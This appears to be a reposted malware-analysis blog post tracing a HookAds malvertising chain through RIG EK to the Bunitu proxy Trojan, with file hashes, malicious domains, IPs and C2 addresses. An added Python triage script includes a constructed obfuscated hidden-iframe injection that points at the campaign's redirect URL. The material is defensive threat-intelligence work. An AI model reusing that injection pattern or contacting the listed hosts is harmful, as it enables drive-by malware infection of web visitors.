Originally posted at malwarebreakdown.com
The HookAds campaign recently became active again after disappearing near the end of 2017. Last week I wrote about it coming back and delivering the Bunitu proxy Trojan. This post will go over the infection chain found on 03/11/18.
HTTP traffic:
The decoy site contains some packed JavaScript:
The Base64 string shown above is decoded and the output is used in the iframe, causing the following GET request:
The server responds with a 301 Moved Permanently pointing to the directory /ywkk/. The request for /ywkk/ returns the pre-landing page with more packed JavaScript:
The pre-landing page filters out unwanted traffic and displays a page showing “404 Not Found”:
Victims that are redirected to the RIG EK landing page are delivered the Bunitu proxy Trojan.
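The decoy-site injection described above (a packed script that Base64-decodes a string and writes it out as an iframe) is a pattern an analyst can triage mechanically. The following Python script is an added example, not code from the post or from the HookAds campaign: it pulls Base64 literals out of a script, decodes the ones that decode cleanly to text, extracts any iframe sources from the result, and flags frames sized 1x1 or hidden by CSS. The sample script it runs on is constructed here to mirror the chain in this post (the decoded iframe pointing at 53hshshshs1.info/ywkk is an assumption about what such an injection looks like, not the actual decoy-site content).

```python
from __future__ import annotations

import base64
import binascii
import re
from urllib.parse import urlparse

# A quoted string made only of Base64 alphabet characters, at least 16 long,
# with optional padding. Short tokens are skipped to cut down on false hits.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE)


def decode_base64_literals(js: str) -> list:
    """Return the decoded text of every Base64 literal that decodes cleanly to UTF-8."""
    decoded = []
    for match in B64_LITERAL.finditer(js):
        token = match.group(1)
        if len(token) % 4:
            continue  # incomplete Base64 quantum; not a real payload
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # non-Base64 string or binary payload; ignore here
        decoded.append(text)
    return decoded


def looks_hidden(tag: str) -> bool:
    """Heuristic: frame is 0/1 pixel in every stated dimension, or hidden via CSS."""
    lowered = tag.lower()
    dims = re.findall(r"""\b(?:width|height)\s*=\s*['"]?(\d+)""", lowered)
    tiny = bool(dims) and all(int(d) <= 1 for d in dims)
    css = lowered.replace(" ", "")
    return tiny or "visibility:hidden" in css or "display:none" in css


def triage_script(js: str) -> list:
    """Decode embedded Base64, then report every iframe source found in the output."""
    findings = []
    for text in decode_base64_literals(js):
        for tag in IFRAME_TAG.findall(text):
            src = SRC_ATTR.search(tag)
            if not src:
                continue
            url = src.group(1)
            parsed = urlparse(url)
            findings.append({
                "url": url,
                "host": parsed.hostname,
                "path": parsed.path,
                "hidden": looks_hidden(tag),
            })
    return findings


# Constructed sample input: an obfuscated snippet in the style of the decoy-page
# injection. The iframe markup is built and encoded inline so the sample stays
# readable; it is NOT the script recovered from the compromised site.
_IFRAME = (
    b'<iframe src="http://53hshshshs1.info/ywkk" width="1" height="1" '
    b'style="visibility:hidden;"></iframe>'
)
SAMPLE_JS = (
    "var _0x4f2a = atob('" + base64.b64encode(_IFRAME).decode("ascii") + "');"
    "document.write(_0x4f2a);"
)


if __name__ == "__main__":
    for finding in triage_script(SAMPLE_JS):
        flag = "HIDDEN" if finding["hidden"] else "visible"
        print(f"{flag:8} iframe -> {finding['host']}{finding['path']}")
```

Run against a saved copy of a suspicious page, the host and path fields are what you compare against proxy logs or block lists; the hidden flag is what separates an injected 1x1 frame from an ordinary embedded widget.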
Hashes
SHA256: 0078ea2e505149a864958511f5a3f733482f8e92639a713807095d8f7a7e7fe8
File name: Pre-Landing Page.txt
SHA256: 6b46ba8d4a4ca55d7fc6781d3a53f5a2b8a2da682bc4b09624ed0e13779b7b46
File name: RIG EK Landing Page.txt
SHA256: 85c5f5a81f6701d597ada200dfd8338078752dc165f97efc094edf4874327c76
File name: RIG EK Flash Exploit.swf
SHA256: 94b882dedcaf288a9bda752767dc65d39cd15f5da4e5615c8fae3f962c806d41
File name: u32.tmp
SHA256: c669bccbd709080fc78d5931afc7337977cd4c5c94c4900052c665a533c53b71
File name: b43.exe
Hybrid-Analysis Report
Any Run Report
SHA256: 9dec506410d00e17a843f13f24241420b83ab815421b19277a620992ce3e63c4
File name: osetril.dll
Hybrid-Analysis Report
IOCs
HTTP Traffic:
88.198.94.53 – 53hshshshs1.info – GET /ywkk – HookAds Redirect
188.225.33.138 – POST and GET – RIG EK IP-Literal Hostname
DNS Queries and Responses:
n.paratozix.net – 63.23.10.118
k.paratozix.net – 4.171.174.235
From HA Reports – “CrowdStrike Bunitu Proxy C2 Registration 1”:
216.58.206.79:443
62.212.66.85:443
Samples
Password is “infected”
Article Link: https://malwarebreakdown.com/2018/03/12/hookads-campaign-delivers-bunitu-proxy-trojan-via-rig-ek/